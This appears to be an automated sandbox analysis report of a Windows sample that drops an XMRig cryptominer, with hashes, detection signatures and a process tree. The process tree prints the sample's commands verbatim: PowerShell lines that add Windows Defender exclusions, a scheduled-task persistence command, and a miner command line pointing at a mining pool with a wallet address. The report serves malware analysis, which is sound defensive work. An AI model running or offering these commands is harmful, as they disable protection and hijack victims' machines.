Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26-11-2024 01:01
Static task
static1
Behavioral task
behavioral1
Sample
188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe
Resource
win10v2004-20241007-en
General
-
Target
188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe
-
Size
37.2MB
-
MD5
15753001204630c254b85fceadcb3027
-
SHA1
ea16917f1cf19b86f53b61e032a010c607a7ed05
-
SHA256
188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5
-
SHA512
7dd7a7ed06139933f79ff5e298fbfa9b63f19e4c7881f55dd208261f4bf5793a9bd58de66dec60b495c40955d61c9182472840358d80ab30f73ef1ab4989d75b
-
SSDEEP
786432:lzynVYtYYbKGk6ojijibkmr3x/Y25UQmxzgir:RYh6ouwPJX5URg
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 17 IoCs
Processes:
resource yara_rule behavioral1/memory/1784-104-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-114-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-118-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-123-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-120-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-116-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-112-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-110-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-108-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-106-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-125-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-129-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-130-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-128-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-127-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-131-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1784-132-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2872 powershell.exe 1536 powershell.exe 1360 powershell.exe 112 powershell.exe -
Executes dropped EXE 6 IoCs
Processes:
sxmr.exeBuilt.exeBuilt.exeservices64.exesihost64.exepid Process 584 sxmr.exe 2660 Built.exe 2940 Built.exe 1136 592 services64.exe 1856 sihost64.exe -
Loads dropped DLL 6 IoCs
Processes:
188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exeBuilt.exeBuilt.execmd.execonhost.exepid Process 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 2660 Built.exe 2940 Built.exe 2820 cmd.exe 2188 conhost.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid Process procid_target PID 2188 set thread context of 1784 2188 conhost.exe 52 -
Processes:
resource yara_rule behavioral1/files/0x000500000001a325-34.dat upx behavioral1/memory/2940-36-0x000007FEF6070000-0x000007FEF6735000-memory.dmp upx behavioral1/memory/2940-38-0x000007FEF6070000-0x000007FEF6735000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exeexplorer.exepid Process 3028 conhost.exe 2872 powershell.exe 1536 powershell.exe 2188 conhost.exe 2188 conhost.exe 1360 powershell.exe 112 powershell.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe 1784 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exeexplorer.exedescription pid Process Token: SeDebugPrivilege 3028 conhost.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 2188 conhost.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeLockMemoryPrivilege 1784 explorer.exe Token: SeLockMemoryPrivilege 1784 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exeBuilt.exesxmr.execonhost.execmd.execmd.execmd.exeservices64.execonhost.execmd.exedescription pid Process procid_target PID 628 wrote to memory of 584 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 31 PID 628 wrote to memory of 584 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 31 PID 628 wrote to memory of 584 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 31 PID 628 wrote to memory of 584 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 31 PID 628 wrote to memory of 2660 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 32 PID 628 wrote to memory of 2660 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 32 PID 628 wrote to memory of 2660 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 32 PID 628 wrote to memory of 2660 628 188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe 32 PID 2660 wrote to memory of 2940 2660 Built.exe 33 PID 2660 wrote to memory of 2940 2660 Built.exe 33 PID 2660 wrote to memory of 2940 2660 Built.exe 33 PID 584 wrote to memory of 3028 584 sxmr.exe 34 PID 584 wrote to memory of 3028 584 sxmr.exe 34 PID 584 wrote to memory of 3028 584 sxmr.exe 34 PID 584 wrote to memory of 3028 584 sxmr.exe 34 PID 3028 wrote to memory of 1572 3028 conhost.exe 35 PID 3028 wrote to memory of 1572 3028 conhost.exe 35 PID 3028 wrote to memory of 1572 3028 conhost.exe 35 PID 1572 wrote to memory of 2872 1572 cmd.exe 37 PID 1572 wrote to memory of 2872 1572 cmd.exe 37 PID 1572 wrote to memory of 2872 1572 cmd.exe 37 PID 3028 wrote to memory of 3052 3028 conhost.exe 39 PID 3028 wrote to memory of 3052 3028 conhost.exe 39 PID 3028 wrote to memory of 3052 3028 conhost.exe 39 PID 3052 wrote to memory of 3060 3052 cmd.exe 41 PID 3052 wrote to memory of 3060 3052 cmd.exe 41 PID 3052 wrote to memory of 3060 3052 cmd.exe 41 PID 1572 wrote to memory of 1536 1572 cmd.exe 42 PID 1572 wrote to memory of 1536 1572 cmd.exe 42 PID 1572 wrote to memory of 1536 1572 cmd.exe 42 PID 3028 wrote to memory of 2820 3028 conhost.exe 43 PID 3028 wrote to memory of 2820 3028 conhost.exe 43 PID 3028 wrote to memory of 2820 3028 conhost.exe 43 PID 2820 wrote to memory of 592 2820 cmd.exe 45 PID 2820 wrote to memory of 592 2820 cmd.exe 45 PID 2820 wrote to memory of 592 2820 cmd.exe 45 PID 592 wrote to memory of 2188 592 services64.exe 46 PID 592 wrote to memory of 2188 592 services64.exe 46 PID 592 wrote to memory of 2188 592 services64.exe 46 PID 592 wrote to memory of 2188 592 services64.exe 46 PID 2188 wrote to memory of 2180 2188 conhost.exe 47 PID 2188 wrote to memory of 2180 2188 conhost.exe 47 PID 2188 wrote to memory of 2180 2188 conhost.exe 47 PID 2180 wrote to memory of 1360 2180 cmd.exe 49 PID 2180 wrote to memory of 1360 2180 cmd.exe 49 PID 2180 wrote to memory of 1360 2180 cmd.exe 49 PID 2188 wrote to memory of 1856 2188 conhost.exe 50 PID 2188 wrote to memory of 1856 2188 conhost.exe 50 PID 2188 wrote to memory of 1856 2188 conhost.exe 50 PID 2180 wrote to memory of 112 2180 cmd.exe 51 PID 2180 wrote to memory of 112 2180 cmd.exe 51 PID 2180 wrote to memory of 112 2180 cmd.exe 51 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 PID 2188 wrote to memory of 1784 2188 conhost.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe"C:\Users\Admin\AppData\Local\Temp\188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Users\Admin\AppData\Local\Temp\sxmr.exe"C:\Users\Admin\AppData\Local\Temp\sxmr.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sxmr.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3060
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"6⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
PID:1856 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵PID:1928
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=44cYetZ659aFV3HZjALibNdHK44yBCckEb1qWMyRmw7QAhNLf7T6EvMW4p7kFA8hzQFXMK8aC1JEtGaG6zriSY1bQK4w5NH --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2940
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb02b8268d6ea28db0ea71bfe24b15d6
SHA186f723fcc4583d7d2bd59ca2749d4b3952cd65a5
SHA25680222651a93099a906be55044024d32e93b841c83554359d6e605d50d11e2e70
SHA512693bbc3c896ad3c6044c832597f946c778e6c6192def3d662803e330209ec1c68d8d33bd82978279ae66b264a892a366183dcef9a3a777e0a6ee450a928268e2
-
Filesize
29.8MB
MD58e9513fab03149898eae08bf8d3b780c
SHA1ab3d6c4ae285e62365cab5f4fb75df69577df7c1
SHA256d1fbc9fc1e7d9fd4b522e624ec518702450bffdf9828e67cc776368c3f5f6b0c
SHA512afa1b1a4970d66208f80750cc7692243b601ae5062958288d9f6585b55056cfe9126f3cd9a74fe1f53defb3dfec94e7c1f7f03c64403dd1071fac515d4a646cd
-
Filesize
31KB
MD50652d5d9657f657b2f0c52fc99196e51
SHA15235469dde99f0dfa335957d64c4c85b9e66b0c7
SHA2566f6c6ece30d2b2873804e23ff5dc565fe40ad059b28eb1275841d3127f5c32b4
SHA512c0de136f920d77de703390754ccda4f403a71d6fd10fd3f43d72e5e227a33e2d5240cc9d0fa1e73023b5c9ff23a1675937200aeeb25fb0da4d830b584eb77fb3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55e264e24030084c2dc08e17b1ab36279
SHA102fd91612521c378801ca8b1f30bb4fc430b462c
SHA256af03b988abd36af9dcd20802e4c6ba9b2f1927564e125ca95fefddbacda97547
SHA512798591838491da32e2c97a951ba4c640c07ad5c336d4b711d320ef4c15b9f8a3213da0d2efe49f5db9365142f8711209b67af273044540da6a63a00316973707
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
7.5MB
MD54d624674d6e526a7ef7507254c865176
SHA189d6d7cfbd15e3815615c4f39513690c877743c9
SHA256127816ffa0bb93e974df4e6f4452258ec0879b7de879d9299a25254d892f7758
SHA512a2dea9106f35b81617083797a36c74d66d2f42cc13b5ccf531f04fc48693ba5742cc0fd2035be430d59be850237e5f1e36be45270302872a29be8377f0de1ef3